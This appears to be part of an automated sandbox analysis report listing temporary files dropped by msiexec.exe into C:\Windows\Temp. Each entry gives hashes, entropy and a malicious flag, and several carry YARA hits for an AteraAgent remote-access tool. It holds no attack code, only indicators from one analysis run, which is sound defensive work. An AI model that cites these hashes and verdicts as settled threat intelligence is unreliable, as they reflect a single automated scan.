                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF4D25842EEB15FD71.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF5987AE4C94D2405D.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF59C1AFBE99E78D01.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):69632
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.1448758646822639
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:CnVubmStedGPdGeqISoedGPdGfoOdrzSTaMFgW:icyLI4QTaR
                                                                                                                                                                                                                                                                                              MD5:6444934467F9AEB55FFFBEBB209521A5
                                                                                                                                                                                                                                                                                              SHA1:C746AAEDA480F952B7F43AA9FB3AC23020CA1B2C
                                                                                                                                                                                                                                                                                              SHA-256:797FD172529788CA0F521BEC4BEB953C98576BB02CE5549A988AB4BDD445BADD
                                                                                                                                                                                                                                                                                              SHA-512:6E6A378AB34727FBA5D71B5F1EC51E50DC885E399DB3972CBFA7613AE9B32A27B7775CB3A14E4246E9A72EECF924B1086E329A3CB62F9675F76C0F11D82BB1D8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF59C1AFBE99E78D01.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF59C1AFBE99E78D01.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF59C1AFBE99E78D01.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF59C1AFBE99E78D01.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF66386BAAA34E81A4.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):69632
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.13063740619553163
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:CnAipVfedGSadGS7qIipVGedGSadGSfEqasJGPWTZkJPw+c+nljQ:CnAStedGPdGeqISoedGPdGTWnj
                                                                                                                                                                                                                                                                                              MD5:043C0130DCD01C7BF7EEDD8AEE5FDDBB
                                                                                                                                                                                                                                                                                              SHA1:ED6E4F94098FE0E44DA6892DB327E5CA4C24E0F7
                                                                                                                                                                                                                                                                                              SHA-256:DE2CCA788A158B2883F3D453E2E4E751F3503170F33810F2AF3D7834801F7BB0
                                                                                                                                                                                                                                                                                              SHA-512:CDB7585748B9FD8587520F93605C06AEE18C1B4D22F28F75037CDBED01D96066C90B5B2916C74583075C0B18B7F4164A5CD5B5BFDB252CFBDB0DCA389618E286
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF66386BAAA34E81A4.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF66386BAAA34E81A4.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF66386BAAA34E81A4.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF6D3B1E9397D72573.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF767FEA75492F0964.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2219215672728465
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:V8PhcuRc06WXJEFT5+DyqISoedGPdGTWaStedGPdGTn:4hc1HFTgDHIOD
                                                                                                                                                                                                                                                                                              MD5:8B9681627CED571797950FE00B9F9D66
                                                                                                                                                                                                                                                                                              SHA1:5300FAAD48805CF2B4E55B9A66961E843802B7B8
                                                                                                                                                                                                                                                                                              SHA-256:90AECFBFFBE468F9A56DDAA317C78EE698E73E4AC616445389D54D1E877C366D
                                                                                                                                                                                                                                                                                              SHA-512:9429DC91CCE304D60F6D59E785C0F76AA027EA08CE3A988940C6C29FC5B59B0E9F21F37CF4A4CB94B5C9B94C3418116D21344369888F4CE9DDB3D5A8C24E8B87
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF767FEA75492F0964.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF767FEA75492F0964.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF818A5253FCA18054.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF884CE156ACD16DC3.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0006922475342237
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:DMMXukNveFXJ5T5p4DKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:tXehTn4DvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:46CE44BED22189CF1AB2CF61EED86FE2
                                                                                                                                                                                                                                                                                              SHA1:51F6D0431C65B24E1FDAD9F41DA11E267A3D63E9
                                                                                                                                                                                                                                                                                              SHA-256:380BA4720745AC4D45211A415B36E693D73B5266A43399D0D837F9C0C06043BA
                                                                                                                                                                                                                                                                                              SHA-512:4368A1653BE8A0A5894A3CED2FBF165C7335D784C04D706834A18ED814A9998C072495900FC8D4558AD303A41C6F349943DB84A7F24A7C60FD34E05B223FF6F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF884CE156ACD16DC3.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF9001B88D7922994B.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF926E7CD57D68F4BF.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF9A4574B4F262FBE9.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):69632
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.16351377624463714
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:TEubmStedvPdv+qISoedvPdvbCnuhnq9Onq9BGw0:hybIciuBuO40
                                                                                                                                                                                                                                                                                              MD5:95F6BB4730F538ECBFDD8B6FCB68ED1E
                                                                                                                                                                                                                                                                                              SHA1:5F1EF9A8E93E003855700931B956F85A6546DACF
                                                                                                                                                                                                                                                                                              SHA-256:7E54DB7E9C01ED9CE12052FC5CD3C7DB2B934BEFB58E5D69A03B3C6BAF94E203
                                                                                                                                                                                                                                                                                              SHA-512:B9AA96F27438117C658B111FD42506B897B897BDF473D271CB400852073FC2D89A500C79886A34D0089F9B7220A01C20F7B39DD3F9C4EAA39CA8ADD778B86A4D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF9A4574B4F262FBE9.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF9CDD7DFF0A80F0FA.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2309993325116284
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3VUuKNveFXJ5T5CDyqISoedGPdGTWaStedGPdGTn:lU8hTkDHIOD
                                                                                                                                                                                                                                                                                              MD5:FCF8BEAA29D6285CFF2000F44F4B5972
                                                                                                                                                                                                                                                                                              SHA1:E80DDE73FF4C29E48F5AF474C1479F4C0AD9346D
                                                                                                                                                                                                                                                                                              SHA-256:81E2E2373C75874284C496257AFDEDE5F9FFD13077B1BA8181110017F962093C
                                                                                                                                                                                                                                                                                              SHA-512:DCF47F5317C3EF5536F31770F2A769157F01190CD30C776C372A6CE8DE13917AE782AB42E681DF3716E3136790B0C33D6E204ECFA2B855530366DB0C5CBF5B4A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF9CDD7DFF0A80F0FA.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFA1047D8CF5719A48.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFB27147300DD38853.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2219215672728465
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:V8PhcuRc06WXJEFT5+DyqISoedGPdGTWaStedGPdGTn:4hc1HFTgDHIOD
                                                                                                                                                                                                                                                                                              MD5:8B9681627CED571797950FE00B9F9D66
                                                                                                                                                                                                                                                                                              SHA1:5300FAAD48805CF2B4E55B9A66961E843802B7B8
                                                                                                                                                                                                                                                                                              SHA-256:90AECFBFFBE468F9A56DDAA317C78EE698E73E4AC616445389D54D1E877C366D
                                                                                                                                                                                                                                                                                              SHA-512:9429DC91CCE304D60F6D59E785C0F76AA027EA08CE3A988940C6C29FC5B59B0E9F21F37CF4A4CB94B5C9B94C3418116D21344369888F4CE9DDB3D5A8C24E8B87
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB27147300DD38853.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFB6CCB0CC037A0B87.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2567140222927486
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:0gduksPveFXJhT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:9dr5TlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:A30478549D793290405A8B0126F7C0C0
                                                                                                                                                                                                                                                                                              SHA1:A2435F6FD86F749B92BF2C41A966B2C036DBED70
                                                                                                                                                                                                                                                                                              SHA-256:AE2C0DF62B1CB042E660217586918E98DD0756DC50227E68F0308CAD95C6A331
                                                                                                                                                                                                                                                                                              SHA-512:6DCFE8EE240DE0FB2490AA86307F230F44BACC6FFF73DCF00C80E3FF3822A29479D86316F684B05A259765B8B9551495D49605C65B5889345E0B3C76C86E9A1F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB6CCB0CC037A0B87.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFD28BC0A1BCBC8C98.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.077966497703753
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO1LtCmOuPrfkiVky6l51:2F0i8n0itFzDHFzTPrfWr
                                                                                                                                                                                                                                                                                              MD5:785EA75A2FB1DB6D9155B28A1291DAF3
                                                                                                                                                                                                                                                                                              SHA1:6B86F7E077D0A8823383FBB776313FEDB17BFDEA
                                                                                                                                                                                                                                                                                              SHA-256:BCD727E77C067BD5A31C13E8024F00ED60381D9AB725CAE2E6777A5708C9DDE0
                                                                                                                                                                                                                                                                                              SHA-512:1834BBF627951711C96708EE7AA4B6C069055E832C717561DC77592E68EFB93E65FE825A5D3D13859057C93BE96CC12701D725491C4CFC49A4EE4FD40942E72A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFD4D9B814BE270625.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.07946708191272502
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOFXjjFZjsTJyv+S1wVky6la:2F0i8n0itFzDHFJQTI+SRa
                                                                                                                                                                                                                                                                                              MD5:A652CABF526AB5C6A007E73B400C40CA
                                                                                                                                                                                                                                                                                              SHA1:3CCB8EDF672257D6474886654C2AB7961CBF2705
                                                                                                                                                                                                                                                                                              SHA-256:E8D664E3F40BB6E21A6658591B6FCEEDA306EE39F15438402B2A10BED46499EE
                                                                                                                                                                                                                                                                                              SHA-512:5139E5D23EAF5B4EC4EDC904EF9CA3CB06DB7EA532044A03A93343B4C3A509F8D13895739262F54FEAB559190F1024F379BBC0473F9C4ACA6A4B7C1EB7555150
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFD7C2903EF9D68D12.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0006922475342237
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:DMMXukNveFXJ5T5p4DKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:tXehTn4DvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:46CE44BED22189CF1AB2CF61EED86FE2
                                                                                                                                                                                                                                                                                              SHA1:51F6D0431C65B24E1FDAD9F41DA11E267A3D63E9
                                                                                                                                                                                                                                                                                              SHA-256:380BA4720745AC4D45211A415B36E693D73B5266A43399D0D837F9C0C06043BA
                                                                                                                                                                                                                                                                                              SHA-512:4368A1653BE8A0A5894A3CED2FBF165C7335D784C04D706834A18ED814A9998C072495900FC8D4558AD303A41C6F349943DB84A7F24A7C60FD34E05B223FF6F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFD7C2903EF9D68D12.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
